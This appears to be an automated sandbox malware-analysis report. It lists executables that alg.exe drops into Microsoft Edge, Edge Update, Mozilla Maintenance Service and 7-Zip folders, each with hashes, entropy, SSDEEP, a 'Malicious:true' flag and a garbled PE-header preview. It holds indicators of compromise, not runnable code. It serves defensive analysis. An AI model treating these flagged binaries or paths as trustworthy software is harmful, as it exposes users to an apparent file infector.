                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.097244647043349
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:UW9Jml9mmijviMnF+ZxmQWcbLw8V2sqjnhMgeiCl7G0nehbGZpbD:UWnm5iOMkjmQWkV6Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9AF20144A58C5D85E7AB17FB64DC3AE8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:97F878D0778126C9F0AF1BDC502D2607BC80A257
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:CDCE8297D9B2C93D8468C9871B7EE8549E3388479ED44DAE9549B20D57870654
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B181E0E80C984AC257EDA4283E73143F234E000A493ADBDEBDC54B3A68FB662462C5C9773F753A3C14A4B2F080E849C5F4B51E5F07F2B0FDCC6CB8E9FA2713F4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....~..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.1663862859762775
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:6wNHwoYhua6MtjRO4qbBJTY6mY1uIgQsqjnhMgeiCl7G0nehbGZpbD:6wNPdQO7BJTfmEHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2E4DB8471FEA6FF009D90CB7926271C6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F33FB7997F714C842FA43BE73E1004C344E4DA3B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E4BFCC4D3A21E3A4BFC3DF6E9A7CEE9826AC30C2A907F082D06F02E96718617A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:0C2830E7960DEA5481261A2CF11A3356DC94DA86D48BB2E1692F5B5D6CE31C9F8F14DE5A8BDBF191BD07B842BAE605D17036EAF95612EBA381ECFFC98AA6BEC7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.1455006307946585
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:niD2VmA1YXwHwlklb8boUuWPg2gtsqjnhMgeiCl7G0nehbGZpbD:iD2VmAyiwIb8boQaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7C661C8C9F38AFE88016D4AC59ADF507
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:07241AFFEE0DA95E49560BEEA358350E4DC31A52
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:21A50779795F10EB1D343EDAD9A62AFE99DF37B08FC128A49E84C95A40535F5E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E0F0191FE4D7EC11F52A6C1F5C0BB972F0A423386FDD541846535F36B5B19C29A11F1C76D253FA356DA042A26B88AFC4BBDFD14BF5E98B65D5F6D0CB345A1BB3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......e..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.166387181892336
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:KwNHwoYhua6MtjRO4qbBJTY6mY1uIgQsqjnhMgeiCl7G0nehbGZpbD:KwNPdQO7BJTfmEHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:675E2D1A8E2AEFD357A8FF5521F88667
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1F3729440797220F0ADA13B72B1DFD66B25363D3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:195906F84EB7966D1353DABF4DC1633176629A8A1E8929FF49A2C3B49A61285C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D6F600CF95637558CA81C6066BFBAE1AB105B9149C69A0720F9B7A2C017FFE11EFE031ADFB93AEF4D3B58DF338C24877F0C1C38975F9817EB70F676D97C94DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.....................................#.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.14184737087937
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:h4lbht6BHXsqjnhMgeiCl7G0nehbGZpbD:SlNtqHrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:65E35F7D5CE2EBC48C24015E5D32BE61
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:AA290AF0C71E3088CD8243D41FD3E3F3E312C372
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AED5A24D3F524FE4DBBC2DED837366521E95EC8BCC17E18ACAF047550C097B51
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:0E5A37AC2D7DA714661D1ED2B576A184934E2382FFA7B8D9EF1AA5B6C7EB9BFF495DEAC3B710BB22B48EC6990569637EE723C10C1839FBB759E5FCD2CA43E66E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@..................................C......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.138860595161254
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EIkOkTB+wDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:EIxkTBVDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:63B77504757FC5213D82C83DE88D14DF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:26CED0C87979C6EC7EED95A3CA0D53A4F780EAEB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:10DF877F65323D1699ABE6A5BD6FBDEEC04D9FE7442AADBDD5FD5272A2E9298B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:7E28876AC8636EF45BE2E0FC8E275EB882261CE2213DCB1739A821371EF222A0775B7885266670E45B21D28FD8EB518E5AFF41A2060D529F9565F69E9CC29DD0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.236790282006968
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:R4lssmroCYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:RcssmrqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0D75D9DBA435AFFB65F1E3805DC9AAD3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:B194AEB22A235761307EAA9B4A6B0A456D5197CC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9E521F9C4C21F724BD14EDDCC51AF020F4BD71EB6B6F7804DB75FDEC366D3BFB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3688116022B1A9A0401ACED6757776178D436B6DC5726A40CC4486B089AB6F4DFF7337F978C904492D5DC5B04F210F3E6430DAAB8FBEE25C62840C80056C484F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@...................................."..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.338542441819919
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:n03cT++foSBWU2YxhkgBsqjnhMgeiCl7G0nehbGZpbD:03cK+foQWU2YnPVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9904A2F624D4D895C38B01C539C6AEE6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:75434C89B6748C5F9724777D28483C64DE42043C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3115D272B2E5E071F48091DC2D17F14FA83471D7B215E31605B2919192713982
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:7D80C61F6B396623DABBA42BDE4254FA74B631B9AD147FECDCB57501490594D9937C799EA6E4771F81315BF2C5A57008E8E188EC38CD883A9D170F6168315697
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..................................g.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.138919963838349
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fbrNRzB+NhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:fbBRzBghsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E057B5A7556A433D158E6B12D13A0C76
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BCC99C0FE679A7E360DDADA241031F58B70D61C1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E70759FFC9BFBC6C056FE554B96669BCC075A863E52646577EADDE7A0E47A63C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6800BBAD4D7D9E0CAD899B67EB6B35CC6E5D4C83D8FDB0825F9377DFB9053B51A50567EE602FFFE866E83FDDDAD18AF8421E01EFB4ECDDE65B4A477F9C3B4BEC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................ur..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.940556417150054
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:Ky53w24gQu3TPZ2psFkiSqwozLDmg27RnWGj:KyFQgZqsFki+ozLD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D5B3A0CC0E4910EF05E84F7562BD952B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EBF340BF9F35BCE84F52A6EC26A8064DFDC3EC65
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:77DB0CED30E6AD6485F555224EA6FC087F90037A8074D1E6FC591209867629B5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:485B26C5BD356550F2B4AFC1EBB965EDDBA72C5F71F59020C3F66CE919CEB1C42A074C73297DC5527B80EEFC69BE62090033B93A515A2E2EB84EC5573CE4C3EC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.347842110394593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:zQVTZu0JmsqjnhMgeiCl7G0nehbGZpbD:EVTZuHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D19B5AFB4E77FACA0D3B604E93630AC1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:476C268335F64DB3384EDDF505D9E99076172468
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:09B88B8208A3BFDF944C255AF871766FD93C5D1EC5794F8CB755242DC963741E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A790F83D5630DCD970E4B4B3303E0A021E7E37238EEEAB412B95A3CDF6A83C12EC37F26A7C31610120F5A6605AAFCF0D60EA8A31686B0CF2173D2498C8685F4D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.623137520466168
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:2+gkESfh4CopsqjnhMgeiCl7G0nehbGZpbD:rgkE+SLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:5294736C0909BE0DBA0F4050AB815BD6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:50501FD0D1F034CECDBE7BB08EC8822B44810301
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B061AC0DB85A443C91CF35BD6223607D0ED9FB94C606870DF83F2F4C6626C718
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:802BA024565151ADB592D3BACABAB700A1AA2A9D8FDA5A387F93CF4867FB8CEC05956B1E368C08EB4186FA3A57C15425138DA7084251AC1649F49DACD584A0DC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. .......U.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.096675249036998
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:qBpDRmi78gkPXlyo0GtjrusqjnhMgeiCl7G0nehbGZpbD:uNRmi78gkPX4o0GtjeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:746ED122597F5449EC6CAE27368E45D5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:8CA683D1EF7D0FA1386276756644D1F2C02D64D0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:0AEB25085E3C0B3661BD98CEBE8F490D8AB093EBC22D1713079FE8CDB275758C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D1D6129AD6350F8FA9FB463C01AB36B139A830F746E229BBA441D0DB168C89E433D4CFC865FFE324C4490AFC5F7037519A6CDFCADC2F24FF6C09400324C29E3E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

